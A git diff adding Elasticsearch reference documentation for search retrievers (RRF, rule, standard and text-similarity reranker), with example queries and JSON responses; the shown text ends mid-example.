+ +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334, + "highlight": { + "text": [ + "Large language models are revolutionizing information retrieval by boosting search precision, deepening contextual understanding, and reshaping user experiences" + ] + } + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334, + "highlight": { + "text": [ + "Artificial intelligence is transforming medicine, from advancing diagnostics and tailoring treatment plans to empowering predictive patient care for improved" + ] + } + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25 + } + ] + } +} +``` + +:::: + + + +## Example: Computing inner hits from nested sub-retrievers [retrievers-examples-inner-hits-retriever-results] + +We can also define `inner_hits` to be computed on any of the sub-retrievers, and propagate those computations to the top level compound retriever. For example, let’s create a new index with a `knn` field, nested under the `nested_field` field, and index a couple of documents. + +```console +PUT retrievers_example_nested +{ + "settings": { + "number_of_shards": 1 + }, + "mappings": { + "properties": { + "nested_field": { + "type": "nested", + "properties": { + "paragraph_id": { + "type": "keyword" + }, + "nested_vector": { + "type": "dense_vector", + "dims": 3, + "similarity": "l2_norm", + "index": true, + "index_options": { + "type": "flat" + } + } + } + }, + "topic": { + "type": "keyword" + } + } + } +} + +POST /retrievers_example_nested/_doc/1 +{ + "nested_field": [ + { + "paragraph_id": "1a", + "nested_vector": [ + -1.12, + -0.59, + 0.78 + ] + }, + { + "paragraph_id": "1b", + "nested_vector": [ + -0.12, + 1.56, + 0.42 + ] + }, + { + "paragraph_id": "1c", + "nested_vector": [ + 1, + -1, + 0 + ] + } + ], + "topic": [ + "ai" + ] +} + +POST /retrievers_example_nested/_doc/2 +{ + "nested_field": [ + { + "paragraph_id": "2a", + "nested_vector": [ + 0.23, + 1.24, + 0.65 + ] + } + ], + "topic": [ + "information_retrieval" + ] +} + +POST /retrievers_example_nested/_doc/3 +{ + "topic": [ + "ai" + ] +} + +POST /retrievers_example_nested/_refresh +``` + +Now we can run an `rrf` retriever query and also compute [inner hits](/reference/elasticsearch/rest-apis/retrieve-inner-hits.md) for the `nested_field.nested_vector` field, based on the `knn` query specified. + +```console +GET /retrievers_example_nested/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "nested": { + "path": "nested_field", + "inner_hits": { + "name": "nested_vector", + "_source": false, + "fields": [ + "nested_field.paragraph_id" + ] + }, + "query": { + "knn": { + "field": "nested_field.nested_vector", + "query_vector": [ + 1, + 0, + 0.5 + ], + "k": 10 + } + } + } + } + } + }, + { + "standard": { + "query": { + "term": { + "topic": "ai" + } + } + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": [ + "topic" + ] +} +``` + +This would propagate the `inner_hits` defined for the `knn` query to the `rrf` retriever, and compute inner hits for `rrf`'s top results. 
+ +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 1.0, + "hits": [ + { + "_index": "retrievers_example_nested", + "_id": "1", + "_score": 1.0, + "_source": { + "topic": [ + "ai" + ] + }, + "inner_hits": { + "nested_vector": { + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.44444445, + "hits": [ + { + "_index": "retrievers_example_nested", + "_id": "1", + "_nested": { + "field": "nested_field", + "offset": 2 + }, + "_score": 0.44444445, + "fields": { + "nested_field": [ + { + "paragraph_id": [ + "1c" + ] + } + ] + } + }, + { + "_index": "retrievers_example_nested", + "_id": "1", + "_nested": { + "field": "nested_field", + "offset": 1 + }, + "_score": 0.21301977, + "fields": { + "nested_field": [ + { + "paragraph_id": [ + "1b" + ] + } + ] + } + }, + { + "_index": "retrievers_example_nested", + "_id": "1", + "_nested": { + "field": "nested_field", + "offset": 0 + }, + "_score": 0.16889325, + "fields": { + "nested_field": [ + { + "paragraph_id": [ + "1a" + ] + } + ] + } + } + ] + } + } + } + }, + { + "_index": "retrievers_example_nested", + "_id": "2", + "_score": 0.33333334, + "_source": { + "topic": [ + "information_retrieval" + ] + }, + "inner_hits": { + "nested_vector": { + "hits": { + "total": { + "value": 1, + "relation": "eq" + }, + "max_score": 0.31715825, + "hits": [ + { + "_index": "retrievers_example_nested", + "_id": "2", + "_nested": { + "field": "nested_field", + "offset": 0 + }, + "_score": 0.31715825, + "fields": { + "nested_field": [ + { + "paragraph_id": [ + "2a" + ] + } + ] + } + } + ] + } + } + } + }, + { + "_index": "retrievers_example_nested", + "_id": "3", + "_score": 0.33333334, + "_source": { + "topic": [ + "ai" + ] + }, + "inner_hits": { + "nested_vector": { + "hits": { + "total": { + "value": 0, + "relation": "eq" + }, + "max_score": null, + "hits": [] + } + } + } + } + ] + } +} +``` + +:::: + + +Note: if using more than one `inner_hits` we need to provide custom names for each `inner_hits` so that they are unique across all retrievers within the request. + + +## Example: Combine RRF with aggregations [retrievers-examples-rrf-and-aggregations] + +Retrievers support both composability and most of the standard `_search` functionality. For instance, we can compute aggregations with the `rrf` retriever. When using a compound retriever, the aggregations are computed based on its nested retrievers. In the following example, the `terms` aggregation for the `topic` field will include all results, not just the top `rank_window_size`, from the 2 nested retrievers, i.e. all documents whose `year` field is greater than 2023, and whose `topic` field matches the term `elastic`. 
+ +```console +GET retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "range": { + "year": { + "gt": 2023 + } + } + } + } + }, + { + "standard": { + "query": { + "term": { + "topic": "elastic" + } + } + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": false, + "aggs": { + "topics": { + "terms": { + "field": "topic" + } + } + } +} +``` + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 4, + "relation": "eq" + }, + "max_score": 0.5833334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "5", + "_score": 0.5833334 + }, + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.5 + }, + { + "_index": "retrievers_example", + "_id": "4", + "_score": 0.5 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.33333334 + } + ] + }, + "aggregations": { + "topics": { + "doc_count_error_upper_bound": 0, + "sum_other_doc_count": 0, + "buckets": [ + { + "key": "ai", + "doc_count": 3 + }, + { + "key": "elastic", + "doc_count": 2 + }, + { + "key": "assistant", + "doc_count": 1 + }, + { + "key": "documentation", + "doc_count": 1 + }, + { + "key": "information_retrieval", + "doc_count": 1 + }, + { + "key": "llm", + "doc_count": 1 + }, + { + "key": "observability", + "doc_count": 1 + }, + { + "key": "security", + "doc_count": 1 + } + ] + } + } +} +``` + +:::: + + + +## Example: Explainability with multiple retrievers [retrievers-examples-explain-multiple-rrf] + +By adding `explain: true` to the request, each retriever will now provide a detailed explanation of all the steps and calculations required to compute the final score. Composability is fully supported in the context of `explain`, and each retriever will provide its own explanation, as shown in the example below. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "term": { + "topic": "elastic" + } + } + } + }, + { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": false, + "size": 1, + "explain": true +} +``` + +The output of which, albeit a bit verbose, will provide all the necessary info to assist in debugging and reason with ranking. 
+ +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 5, + "relation": "eq" + }, + "max_score": 0.5, + "hits": [ + { + "_shard": "[retrievers_example][0]", + "_node": "jnrdZFKS3abUgWVsVdj2Vg", + "_index": "retrievers_example", + "_id": "1", + "_score": 0.5, + "_explanation": { + "value": 0.5, + "description": "rrf score: [0.5] computed for initial ranks [0, 1] with rankConstant: [1] as sum of [1 / (rank + rankConstant)] for each query", + "details": [ + { + "value": 0.0, + "description": "rrf score: [0], result not found in query at index [0]", + "details": [] + }, + { + "value": 1, + "description": "rrf score: [0.5], for rank [1] in query at index [1] computed as [1 / (1 + 1)], for matching query with score", + "details": [ + { + "value": 0.8333334, + "description": "rrf score: [0.8333334] computed for initial ranks [2, 1] with rankConstant: [1] as sum of [1 / (rank + rankConstant)] for each query", + "details": [ + { + "value": 2, + "description": "rrf score: [0.33333334], for rank [2] in query at index [0] computed as [1 / (2 + 1)], for matching query with score", + "details": [ + { + "value": 2.8129659, + "description": "sum of:", + "details": [ + { + "value": 1.4064829, + "description": "weight(text:information in 0) [PerFieldSimilarity], result of:", + "details": [ + *** + ] + }, + { + "value": 1.4064829, + "description": "weight(text:retrieval in 0) [PerFieldSimilarity], result of:", + "details": [ + *** + ] + } + ] + } + ] + }, + { + "value": 1, + "description": "rrf score: [0.5], for rank [1] in query at index [1] computed as [1 / (1 + 1)], for matching query with score", + "details": [ + { + "value": 1, + "description": "doc [0] with an original score of [1.0] is at rank [1] from the following source queries.", + "details": [ + { + "value": 1.0, + "description": "found vector with calculated similarity: 1.0", + "details": [] + } + ] + } + ] + } + ] + } + ] + } + ] + } + } + ] + } +} +``` + +:::: + + + +## Example: Rerank results of an RRF retriever [retrievers-examples-text-similarity-reranker-on-top-of-rrf] + +To demonstrate the full functionality of retrievers, the following examples also require access to a [semantic reranking model](docs-content://solutions/search/ranking/semantic-reranking.md) set up using the [Elastic inference APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-inference). + +In this example we’ll set up a reranking service and use it with the `text_similarity_reranker` retriever to rerank our top results. + +```console +PUT _inference/rerank/my-rerank-model +{ + "service": "cohere", + "service_settings": { + "model_id": "rerank-english-v3.0", + "api_key": "{{COHERE_API_KEY}}" + } +} +``` + +Let’s start by reranking the results of the `rrf` retriever in our previous example. 
+ +```console +GET retrievers_example/_search +{ + "retriever": { + "text_similarity_reranker": { + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "field": "text", + "inference_id": "my-rerank-model", + "inference_text": "What are the state of the art applications of AI in information retrieval?" + } + }, + "_source": false +} +``` + + +## Example: RRF with semantic reranker [retrievers-examples-rrf-ranking-on-text-similarity-reranker-results] + +For this example, we’ll replace the rrf’s `standard` retriever with the `text_similarity_reranker` retriever, using the `my-rerank-model` reranker we previously configured. Since this is a reranker, it needs an initial pool of documents to work with. In this case, we’ll rerank the top `rank_window_size` documents matching the `ai` topic. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + }, + { + "text_similarity_reranker": { + "retriever": { + "standard": { + "query": { + "term": { + "topic": "ai" + } + } + } + }, + "field": "text", + "inference_id": "my-rerank-model", + "inference_text": "Can I use generative AI to identify user intent and improve search relevance?" + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": false +} +``` + + +## Example: Chaining multiple semantic rerankers [retrievers-examples-chaining-text-similarity-reranker-retrievers] + +Full composability means we can chain together multiple retrievers of the same type. For instance, imagine we have a computationally expensive reranker that’s specialized for AI content. We can rerank the results of a `text_similarity_reranker` using another `text_similarity_reranker` retriever. Each reranker can operate on different fields and/or use different inference services. + +```console +GET retrievers_example/_search +{ + "retriever": { + "text_similarity_reranker": { + "retriever": { + "text_similarity_reranker": { + "retriever": { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + }, + "rank_window_size": 100, + "field": "text", + "inference_id": "my-rerank-model", + "inference_text": "What are the state of the art applications of AI in information retrieval?" + } + }, + "rank_window_size": 10, + "field": "text", + "inference_id": "my-other-more-expensive-rerank-model", + "inference_text": "Applications of Large Language Models in technology and their impact on user satisfaction" + } + }, + "_source": false +} +``` + +Note that our example applies two reranking steps. First, we rerank the top 100 documents from the `knn` search using the `my-rerank-model` reranker. Then we pick the top 10 results and rerank them using the more fine-grained `my-other-more-expensive-rerank-model`. 
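+
+Reranker retrievers also accept a `min_score` threshold, which can trim low-confidence hits from any stage of such a chain. The following is a minimal sketch applied to the first reranking step; the `0.5` threshold is illustrative and model-dependent:
+
+```console
+GET retrievers_example/_search
+{
+  "retriever": {
+    "text_similarity_reranker": {
+      "retriever": {
+        "knn": {
+          "field": "vector",
+          "query_vector": [ 0.23, 0.67, 0.89 ],
+          "k": 3,
+          "num_candidates": 5
+        }
+      },
+      "rank_window_size": 100,
+      "min_score": 0.5,
+      "field": "text",
+      "inference_id": "my-rerank-model",
+      "inference_text": "What are the state of the art applications of AI in information retrieval?"
+    }
+  },
+  "_source": false
+}
+```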
+ diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md new file mode 100644 index 0000000000000..622f8881cf84f --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md @@ -0,0 +1,149 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# RRF retriever [rrf-retriever] + +An [RRF](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md) retriever returns top documents based on the RRF formula, equally weighting two or more child retrievers. +Reciprocal rank fusion (RRF) is a method for combining multiple result sets with different relevance indicators into a single result set. + + +## Parameters [rrf-retriever-parameters] + +::::{note} +Either `query` or `retrievers` must be specified. +Combining `query` and `retrievers` is not supported. +:::: + +`query` {applies_to}`stack: ga 9.1` +: (Optional, String) + + The query to use when using the [multi-field query format](../retrievers.md#multi-field-query-format). + +`fields` {applies_to}`stack: ga 9.1` +: (Optional, array of strings) + + The fields to query when using the [multi-field query format](../retrievers.md#multi-field-query-format). + If not specified, uses the index's default fields from the `index.query.default_field` index setting, which is `*` by default. + +`retrievers` +: (Optional, array of retriever objects) + + A list of child retrievers to specify which sets of returned top documents will have the RRF formula applied to them. + Each child retriever carries an equal weight as part of the RRF formula. Two or more child retrievers are required. + +`rank_constant` +: (Optional, integer) + + This value determines how much influence documents in individual result sets per query have over the final ranked result set. A higher value indicates that lower ranked documents have more influence. This value must be greater than or equal to `1`. Defaults to `60`. + +`rank_window_size` +: (Optional, integer) + + This value determines the size of the individual result sets per query. + A higher value will improve result relevance at the cost of performance. + The final ranked result set is pruned down to the search request’s [size](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param). + `rank_window_size` must be greater than or equal to `size` and greater than or equal to `1`. + Defaults to 10. + +`filter` +: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) + + Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to all of the specified sub-retrievers, according to each retriever’s specifications. + +## Example: Hybrid search [rrf-retriever-example-hybrid] + +A simple hybrid search example (lexical search + dense vector search) combining a `standard` retriever with a `knn` retriever using RRF: + +```console +GET /restaurants/_search +{ + "retriever": { + "rrf": { <1> + "retrievers": [ <2> + { + "standard": { <3> + "query": { + "multi_match": { + "query": "Austria", + "fields": [ + "city", + "region" + ] + } + } + } + }, + { + "knn": { <4> + "field": "vector", + "query_vector": [10, 22, 77], + "k": 10, + "num_candidates": 10 + } + } + ], + "rank_constant": 1, <5> + "rank_window_size": 50 <6> + } + } +} +``` + +1. Defines a retriever tree with an RRF retriever. +2. The sub-retriever array. +3. The first sub-retriever is a `standard` retriever. +4. 
The second sub-retriever is a `knn` retriever. +5. The rank constant for the RRF retriever. +6. The rank window size for the RRF retriever. + +## Example: Hybrid search with sparse vectors [rrf-retriever-example-hybrid-sparse] + +A more complex hybrid search example (lexical search + ELSER sparse vector search + dense vector search) using RRF: + +```console +GET movies/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "sparse_vector": { + "field": "plot_embedding", + "inference_id": "my-elser-model", + "query": "films that explore psychological depths" + } + } + } + }, + { + "standard": { + "query": { + "multi_match": { + "query": "crime", + "fields": [ + "plot", + "title" + ] + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [10, 22, 77], + "k": 10, + "num_candidates": 10 + } + } + ] + } + } +} +``` + diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md new file mode 100644 index 0000000000000..e9bd4ac78d2cc --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md @@ -0,0 +1,121 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# Query rules retriever [rule-retriever] + +The `rule` retriever enables fine-grained control over search results by applying contextual [query rules](/reference/elasticsearch/rest-apis/searching-with-query-rules.md#query-rules) to pin or exclude documents for specific queries. This retriever has similar functionality to the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md), but works out of the box with other retrievers. + +## Prerequisites [_prerequisites_16] + +To use the `rule` retriever you must first create one or more query rulesets using the [query rules management APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules). + +## Parameters [rule-retriever-parameters] + +`retriever` +: (Required, `retriever`) + + The child retriever that returns the results to apply query rules on top of. This can be a standalone retriever such as the [standard](standard-retriever.md) or [knn](knn-retriever.md) retriever, or it can be a compound retriever. + + +`ruleset_ids` +: (Required, `array`) + + An array of one or more unique [query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules) IDs with query-based rules to match and apply as applicable. Rulesets and their associated rules are evaluated in the order in which they are specified in the query and ruleset. The maximum number of rulesets to specify is 10. + + +`match_criteria` +: (Required, `object`) + + Defines the match criteria to apply to rules in the given query ruleset(s). Match criteria should match the keys defined in the `criteria.metadata` field of the rule. + + +`rank_window_size` +: (Optional, `int`) + + The number of top documents to return from the `rule` retriever. Defaults to `10`. + +## Example: Rule retriever [rule-retriever-example] + +This example shows the rule retriever executed without any additional retrievers. It runs the query defined by the `retriever` and applies the rules from `my-ruleset` on top of the returned results. 
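+
+If you have not created `my-ruleset` yet, a minimal sketch of a compatible ruleset (the rule and document IDs are illustrative) can be defined first with the query rules APIs:
+
+```console
+PUT _query_rules/my-ruleset
+{
+  "rules": [
+    {
+      "rule_id": "rule1",
+      "type": "pinned",
+      "criteria": [
+        {
+          "type": "exact",
+          "metadata": "query_string",
+          "values": [ "harry potter" ]
+        }
+      ],
+      "actions": {
+        "ids": [ "id1", "id2" ]
+      }
+    }
+  ]
+}
+```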
+ +```console +GET movies/_search +{ + "retriever": { + "rule": { + "match_criteria": { + "query_string": "harry potter" + }, + "ruleset_ids": [ + "my-ruleset" + ], + "retriever": { + "standard": { + "query": { + "query_string": { + "query": "harry potter" + } + } + } + } + } + } +} +``` + +## Example: Rule retriever combined with RRF [rule-retriever-example-rrf] + +This example shows how to combine the `rule` retriever with other rerank retrievers such as [rrf](rrf-retriever.md) or [text_similarity_reranker](text-similarity-reranker-retriever.md). + +::::{warning} +The `rule` retriever will apply rules to any documents returned from its defined `retriever` or any of its sub-retrievers. This means that for the best results, the `rule` retriever should be the outermost defined retriever. Nesting a `rule` retriever as a sub-retriever under a reranker such as `rrf` or `text_similarity_reranker` may not produce the expected results. + +:::: + + +```console +GET movies/_search +{ + "retriever": { + "rule": { <1> + "match_criteria": { + "query_string": "harry potter" + }, + "ruleset_ids": [ + "my-ruleset" + ], + "retriever": { + "rrf": { <2> + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "sorcerer's stone" + } + } + } + }, + { + "standard": { + "query": { + "query_string": { + "query": "chamber of secrets" + } + } + } + } + ] + } + } + } + } +} +``` + +1. The `rule` retriever is the outermost retriever, applying rules to the search results that were previously reranked using the `rrf` retriever. +2. The `rrf` retriever returns results from all of its sub-retrievers, and the output of the `rrf` retriever is used as input to the `rule` retriever. + diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md new file mode 100644 index 0000000000000..e4c6e4b7554da --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md @@ -0,0 +1,98 @@ +--- +applies_to: + stack: all + serverless: ga +--- +# Standard retriever [standard-retriever] + +A standard retriever returns top documents from a traditional [query](/reference/query-languages/querydsl.md). + + +### Parameters: [standard-retriever-parameters] + +`query` +: (Optional, [query object](/reference/query-languages/querydsl.md)) + + Defines a query to retrieve a set of top documents. + + +`filter` +: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) + + Applies a [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to this retriever, where all documents must match this query but do not contribute to the score. + + +`search_after` +: (Optional, [search after object](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after)) + + Defines a search after object parameter used for pagination. + + +`terminate_after` +: (Optional, integer) Maximum number of documents to collect for each shard. If a query reaches this limit, {{es}} terminates the query early. {{es}} collects documents before sorting. + + ::::{important} + Use with caution. {{es}} applies this parameter to each shard handling the request. When possible, let {{es}} perform early termination automatically. Avoid specifying this parameter for requests that target data streams with backing indices across multiple data tiers. 
+ :::: + + +`sort` +: (Optional, [sort object](/reference/elasticsearch/rest-apis/sort-search-results.md)) A sort object that specifies the order of matching documents. + + +`min_score` +: (Optional, `float`) + + Minimum [`_score`](/reference/query-languages/query-dsl/query-filter-context.md#relevance-scores) for matching documents. Documents with a lower `_score` are not included in the top documents. + + +`collapse` +: (Optional, [collapse object](/reference/elasticsearch/rest-apis/collapse-search-results.md)) + + Collapses the top documents by a specified key into a single top document per key. + + +## Restrictions [_restrictions] + +When a retriever tree contains a compound retriever (a retriever with two or more child retrievers) the [search after](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after) parameter is not supported. + + +## Example [standard-retriever-example] + +```console +GET /restaurants/_search +{ + "retriever": { <1> + "standard": { <2> + "query": { <3> + "bool": { <4> + "should": [ <5> + { + "match": { <6> + "region": "Austria" + } + } + ], + "filter": [ <7> + { + "term": { <8> + "year": "2019" <9> + } + } + ] + } + } + } + } +} +``` + +1. Opens the `retriever` object. +2. The `standard` retriever is used for defining traditional {{es}} queries. +3. The entry point for defining the search query. +4. The `bool` object allows for combining multiple query clauses logically. +5. The `should` array indicates conditions under which a document will match. Documents matching these conditions will have increased relevancy scores. +6. The `match` object finds documents where the `region` field contains the word "Austria." +7. The `filter` array provides filtering conditions that must be met but do not contribute to the relevancy score. +8. The `term` object is used for exact matches, in this case, filtering documents by the `year` field. +9. The exact value to match in the `year` field. diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md new file mode 100644 index 0000000000000..9abb236a45d1e --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md @@ -0,0 +1,248 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# Text similarity re-ranker retriever [text-similarity-reranker-retriever] + +The `text_similarity_reranker` retriever uses an NLP model to improve search results by reordering the top-k documents based on their semantic similarity to the query. + +::::{tip} +Refer to [*Semantic re-ranking*](docs-content://solutions/search/ranking/semantic-reranking.md) for a high level overview of semantic re-ranking. +:::: + +## Prerequisites [_prerequisites_15] + +To use `text_similarity_reranker`, you can rely on the preconfigured `.rerank-v1-elasticsearch` inference endpoint, which uses the [Elastic Rerank model](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) and serves as the default if no `inference_id` is provided. This model is optimized for reranking based on text similarity. If you'd like to use a different model, you can set up a custom inference endpoint for the `rerank` task using the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put). The endpoint should be configured with a machine learning model capable of computing text similarity. 
Refer to [the Elastic NLP model reference](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-model-ref.md#ml-nlp-model-ref-text-similarity) for a list of third-party text similarity models supported by {{es}}.
+
+You have the following options:
+
+* Use the built-in [Elastic Rerank](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) cross-encoder model via the inference API’s {{es}} service. See [this example](https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-elasticsearch.html#inference-example-elastic-reranker) for creating an endpoint using the Elastic Rerank model.
+* Use the [Cohere Rerank inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type.
+* Use the [Google Vertex AI inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type.
+* Upload a model to {{es}} with [Eland](eland://reference/machine-learning.md#ml-nlp-pytorch) using the `text_similarity` NLP task type.
+
+    * Then set up an [{{es}} service inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type.
+    * Refer to the [example](#text-similarity-reranker-retriever-example-eland) on this page for a step-by-step guide.
+
+
+::::{important}
+Scores from the re-ranking process are normalized using the following formula before being returned to the user, to avoid having negative scores.
+
+```text
+score = max(score, 0) + min(exp(score), 1)
+```
+
+Using the above, any initially negative scores are projected to (0, 1) and positive scores to [1, infinity). For example, a raw score of `-0.5` is normalized to `exp(-0.5) ≈ 0.61`, while a raw score of `2.0` becomes `2.0 + 1 = 3.0`. To reverse the normalization if needed, one can use:
+
+```text
+score = score - 1, if score >= 1
+score = ln(score), if score < 1
+```
+
+::::
+
+## Parameters [text-similarity-reranker-retriever-parameters]
+
+`retriever`
+: (Required, `retriever`)
+
+    The child retriever that generates the initial set of top documents to be re-ranked.
+
+
+`field`
+: (Required, `string`)
+
+    The document field to be used for text similarity comparisons. This field should contain the text that will be evaluated against the `inferenceText`.
+
+
+`inference_id`
+: (Optional, `string`)
+
+    Unique identifier of the inference endpoint created using the {{infer}} API. If you don’t specify an inference endpoint, the `inference_id` field defaults to `.rerank-v1-elasticsearch`, a preconfigured endpoint for the elasticsearch `.rerank-v1` model.
+
+
+`inference_text`
+: (Required, `string`)
+
+    The text snippet used as the basis for similarity comparison.
+
+
+`rank_window_size`
+: (Optional, `int`)
+
+    The number of top documents to consider in the re-ranking process. Defaults to `10`.
+
+
+`min_score`
+: (Optional, `float`)
+
+    Sets a minimum threshold score for including documents in the re-ranked results. Documents with similarity scores below this threshold will be excluded. Note that score calculations vary depending on the model used.
+
+
+`filter`
+: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md))
+
+    Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to the child `retriever`. If the child retriever already specifies any filters, then this top-level filter is applied in conjunction with the filter defined in the child retriever.
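+
+As a brief illustration of the `filter` parameter, the following minimal sketch (index, field, and endpoint names are hypothetical) narrows the candidate pool before the re-ranking step:
+
+```console
+GET /index/_search
+{
+  "retriever": {
+    "text_similarity_reranker": {
+      "retriever": {
+        "standard": {
+          "query": {
+            "match": {
+              "text": "landmark in Paris"
+            }
+          }
+        }
+      },
+      "filter": {
+        "term": {
+          "year": 2024
+        }
+      },
+      "field": "text",
+      "inference_id": "my-rerank-model",
+      "inference_text": "Most famous landmark in Paris"
+    }
+  }
+}
+```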
+ + + +## Example: Elastic Rerank [text-similarity-reranker-retriever-example-elastic-rerank] + +::::{tip} +Refer to this [Python notebook](https://github.com/elastic/elasticsearch-labs/blob/main/notebooks/search/12-semantic-reranking-elastic-rerank.ipynb) for an end-to-end example using Elastic Rerank. + +:::: + + +This example demonstrates how to deploy the [Elastic Rerank](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) model and use it to re-rank search results using the `text_similarity_reranker` retriever. + +Follow these steps: + +1. Create an inference endpoint for the `rerank` task using the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put). + + ```console + PUT _inference/rerank/my-elastic-rerank + { + "service": "elasticsearch", + "service_settings": { + "model_id": ".rerank-v1", + "num_threads": 1, + "adaptive_allocations": { <1> + "enabled": true, + "min_number_of_allocations": 1, + "max_number_of_allocations": 10 + } + } + } + ``` + + 1. [Adaptive allocations](docs-content://deploy-manage/autoscaling/trained-model-autoscaling.md#enabling-autoscaling-through-apis-adaptive-allocations) will be enabled with the minimum of 1 and the maximum of 10 allocations. + +2. Define a `text_similarity_rerank` retriever: + + ```console + POST _search + { + "retriever": { + "text_similarity_reranker": { + "retriever": { + "standard": { + "query": { + "match": { + "text": "How often does the moon hide the sun?" + } + } + } + }, + "field": "text", + "inference_id": "my-elastic-rerank", + "inference_text": "How often does the moon hide the sun?", + "rank_window_size": 100, + "min_score": 0.5 + } + } + } + ``` + + + +## Example: Cohere Rerank [text-similarity-reranker-retriever-example-cohere] + +This example enables out-of-the-box semantic search by re-ranking top documents using the Cohere Rerank API. This approach eliminates the need to generate and store embeddings for all indexed documents. This requires a [Cohere Rerank inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) that is set up for the `rerank` task type. + +```console +GET /index/_search +{ + "retriever": { + "text_similarity_reranker": { + "retriever": { + "standard": { + "query": { + "match_phrase": { + "text": "landmark in Paris" + } + } + } + 